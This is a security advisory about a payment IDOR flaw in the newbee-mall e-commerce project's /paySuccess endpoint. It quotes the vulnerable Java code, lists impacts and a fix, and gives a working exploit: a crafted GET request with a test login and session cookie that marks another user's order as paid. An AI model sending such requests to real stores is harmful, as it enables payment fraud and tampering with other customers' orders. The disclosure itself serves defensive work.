Critical Payment Vulnerability (IDOR) in /paySuccess of newbee-mall

[ez-lbz]

Critical Payment Vulnerability (IDOR) in /paySuccess of newbee-mall

Summary

In newbee-mall, the /paySuccess endpoint contains a critical payment vulnerability. This endpoint directly updates the order status in the database based on the order ID provided by the client-side request. As a result, attackers can arbitrarily mark orders as paid by sending crafted requests.

In addition, the endpoint suffers from horizontal privilege escalation: a user can modify the payment status of other users’ orders, potentially compromising the entire transaction system.

Analysis

Reviewing the OrderController class shows that the paySuccess method contains no authorization logic.

@GetMapping("/paySuccess")
    @ResponseBody
    public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
        String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
        if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
            return ResultGenerator.genSuccessResult();
        } else {
            return ResultGenerator.genFailResult(payResult);
        }
    }

Following into NewBeeMallOrderServiceImpl.paySuccess, no authorization checks are present there either.

@Override
    public String paySuccess(String orderNo, int payType) {
        NewBeeMallOrder newBeeMallOrder = newBeeMallOrderMapper.selectByOrderNo(orderNo);
        if (newBeeMallOrder != null) {
            //订单状态判断 非待支付状态下不进行修改操作
            if (newBeeMallOrder.getOrderStatus().intValue() != NewBeeMallOrderStatusEnum.ORDER_PRE_PAY.getOrderStatus()) {
                return ServiceResultEnum.ORDER_STATUS_ERROR.getResult();
            }
            newBeeMallOrder.setOrderStatus((byte) NewBeeMallOrderStatusEnum.ORDER_PAID.getOrderStatus());
            newBeeMallOrder.setPayType((byte) payType);
            newBeeMallOrder.setPayStatus((byte) PayStatusEnum.PAY_SUCCESS.getPayStatus());
            newBeeMallOrder.setPayTime(new Date());
            newBeeMallOrder.setUpdateTime(new Date());
            if (newBeeMallOrderMapper.updateByPrimaryKeySelective(newBeeMallOrder) > 0) {
                return ServiceResultEnum.SUCCESS.getResult();
            } else {
                return ServiceResultEnum.DB_ERROR.getResult();
            }
        }
        return ServiceResultEnum.ORDER_NOT_EXIST_ERROR.getResult();
    }

This confirms the presence of a payment vulnerability.

Exploitation

Log in with a normal user account, e.g., 13700002703/123456, and send a crafted request to /paySuccess with another user’s order ID.

GET /paySuccess?payType=2&orderNo=15692218454123239 HTTP/1.1
Host: localhost:28089
Sec-Fetch-Dest: empty
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
sec-ch-ua-mobile: ?0
Cookie: JSESSIONID=6C4975A8A36CAD2F1A5288233A2F4102
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Sec-Fetch-Mode: cors
Referer: http://localhost:28089/payPage?orderNo=15689090398492576&payType=2
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest

Checking the database shows that the targeted order status has been updated to "微信支付", verifying the vulnerability.

Impact

• Zero-cost purchases by marking arbitrary orders as paid

• Horizontal privilege escalation enabling attackers to modify other users’ orders

• Complete disruption of the transaction system

Remediation

The payment process should be completed only through trusted third-party payment provider callbacks (e.g., WeChat Pay, Alipay). The system must not rely on parameters sent directly from the client.